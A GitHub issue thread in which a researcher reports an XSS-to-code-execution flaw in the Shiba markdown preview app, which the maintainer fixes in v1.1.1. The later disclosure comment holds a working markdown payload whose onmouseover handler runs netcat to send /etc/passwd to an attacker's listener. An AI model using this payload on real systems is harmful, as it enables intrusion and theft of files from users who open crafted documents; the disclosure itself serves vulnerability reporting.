Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

XSS to RCE vulnerability report #42

Closed
silviavali opened this issue Nov 25, 2017 · 8 comments
Closed

XSS to RCE vulnerability report #42

silviavali opened this issue Nov 25, 2017 · 8 comments

Comments

@silviavali
Copy link

Hello,

I would like to report a XSS vulnerability in your application that leads to code execution.
I have a working POC that I dont want to post publicly.
Please contact me at silviavali14@gmail.com
@rhysd
Copy link
Owner

rhysd commented Nov 30, 2017
edited
Loading

This was fixed in v1.1.1. So I'm closing. Thank you for your report.

@rhysd rhysd closed this as completed Nov 30, 2017
@silviavali
Copy link
Author

silviavali commented Dec 1, 2017 via email

@attritionorg
Copy link

@rhysd Can you confirm e8a65b0 is the fixing commit?

@silviavali
Copy link
Author

silviavali commented Dec 6, 2017 via email

@rhysd
Copy link
Owner

rhysd commented Dec 6, 2017

@attritionorg Yes.

@silviavali
Copy link
Author

"XSS to code execution vulnerability due to enabled nodeIntegration"

Date reported: 25th Nov, 2017
Vulnerable version: v1.1.0
Fixed on: Nov 28, 2017, version v1.1.1 (note: some of the HTML elements have been allowed since version v1.2.0)
Fixing commit: e8a65b0

Shiba is rich live markdown preview app with linter. It provides functionality to open .md files,
which means those files can be written by the user him/herself or markdown files shared to the user
by some other third party.

Reproduce the vulnerability:
Attacker runs the following command in terminal and remains waiting for the connection 'home':
nc -l -p 1337 > passwd.txt

Attacker crafts the following file: payload.md, delivers it to the victim and victim opens it in Shiba:
<s <onmouseover="alert(1)"> <s onmouseover="const exec = require('child_process').exec; exec('nc -w 3 192.168.8.100 1337 < /etc/passwd', (e, stdout, stderr)=> { if (e instanceof Error) { console.error(e); throw e; } console.log('stdout ', stdout); console.log('stderr ', stderr); });alert('1')">Hallo</s>

Possible scenario:
Attacker crafts a markdown file ’payload.md’ and makes it publicly available for download or tricks the victim to download it some other way and open it with the Shiba application. Attacker starts netcat and listens on port 1337 to receive /etc/passwd file content form the victim’s machine. Victim has downloaded and opened the file in Shiba application. If victim now hovers over the file content on the markdown editor, the payload gets executed on the background and the attacker receives the ‘/etc/passwd’ file content from the victim’s machine.

image

You can be sure that payload got triggered when alert 1 appears on victim’s screen.
image

Output from developer tools:
image

By now attacker has received the contents of the /etc/passwd file as the result:
image

@rhysd
Copy link
Owner

rhysd commented May 17, 2018

Thank you for your report. I'll investigate this issue this weekend.

@rhysd rhysd reopened this May 17, 2018
@rhysd
Copy link
Owner

rhysd commented May 17, 2018

Ah, I'm sorry that I misunderstood your comment. #42 (comment) is a disclosure of this problem and already fixed.

@rhysd rhysd closed this as completed May 17, 2018
@rhysd rhysd mentioned this issue Feb 25, 2019
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@rhysd @attritionorg @silviavali